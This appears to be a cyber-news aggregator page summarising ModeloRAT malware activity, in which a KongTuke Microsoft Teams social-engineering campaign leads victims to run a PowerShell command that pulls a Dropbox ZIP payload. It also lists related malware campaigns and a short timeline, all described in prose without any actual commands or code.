Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

ModeloRAT malicious PowerShell and Dropbox delivery activity

Malware Activity
First reported
Last updated
Happening score
H score 16
1 unique sources, 1 articles

Summary

Hide ▲

The ModeloRAT activity now uses a malicious PowerShell command and a Dropbox ZIP payload to gain persistent footholds, enabling system reconnaissance, screenshot capture, and file exfiltration on compromised hosts. The chain matters because it turns a short social-engineering interaction into remote control and data theft capability. The latest build also strengthens persistence and C2 resilience.

Related Happenings

KongTuke Microsoft Teams initial access campaign

Campaign
First: 14.05.2026 15:12 Last: 14.05.2026 15:12 Sources 1

How related: The campaign has been active since at least April 2026, with KongTuke rotating through five Microsoft 365 tenants to evade blocking, the researchers say.

About this happening: The **KongTuke** campaign now uses **Microsoft Teams** social engineering to gain persistent access to **corporate networks**, shortening initial compromise to **under five minute...

Open Happening

ClickFix attacks with PySoxy scheduled-task persistence

Malware Activity
First: 12.05.2026 15:00 Last: 12.05.2026 15:00 Sources 1

About this happening: Cybercriminals are combining **ClickFix** with **PySoxy** to preserve access on victim machines, letting activity restart even after removal attempts. The setup uses a **Python SO...

Open Happening

DEEP#DOOR Python backdoor framework

Malware Activity
First: 30.04.2026 15:36 Last: 30.04.2026 15:36 Sources 1

About this happening: **DEEP#DOOR** is a newly disclosed **Python-based backdoor framework** that can keep **persistent access** to compromised Windows hosts while stealing browser, SSH, and cloud cred...

Open Happening

GlassWorm v2 cloned VS Code extension loaders

Malware Activity
First: 27.04.2026 14:23 Last: 27.04.2026 14:23 Sources 1

About this happening: The **GlassWorm v2** malware activity now uses **cloned VS Code extensions** on **Open VSX** to deliver payloads that steal credentials, deploy a **RAT**, and spread across multip...

Open Happening

Snow malware suite deployment by UNC6692

Malware Activity
First: 25.04.2026 18:07 Last: 25.04.2026 18:07 Sources 1

About this happening: UNC6692 has deployed the **Snow** malware suite through **social engineering**, creating a stealthy path to **credential theft** and **domain compromise**. The operation uses **em...

Open Happening

Timeline

  1. 14.05.2026 15:12 2 articles · 13d ago

    KongTuke Teams delivery of ModeloRAT

    Initial Disclosure

    KongTuke shifts to Microsoft Teams social engineering against corporate users, persuading victims to run a malicious PowerShell command that downloads a Dropbox ZIP archive, launches a portable WinPython environment and Pmanager.py, and deploys ModeloRAT for system reconnaissance, screenshot capture, file exfiltration, and persistent access.

    Show sources
    Open in new tab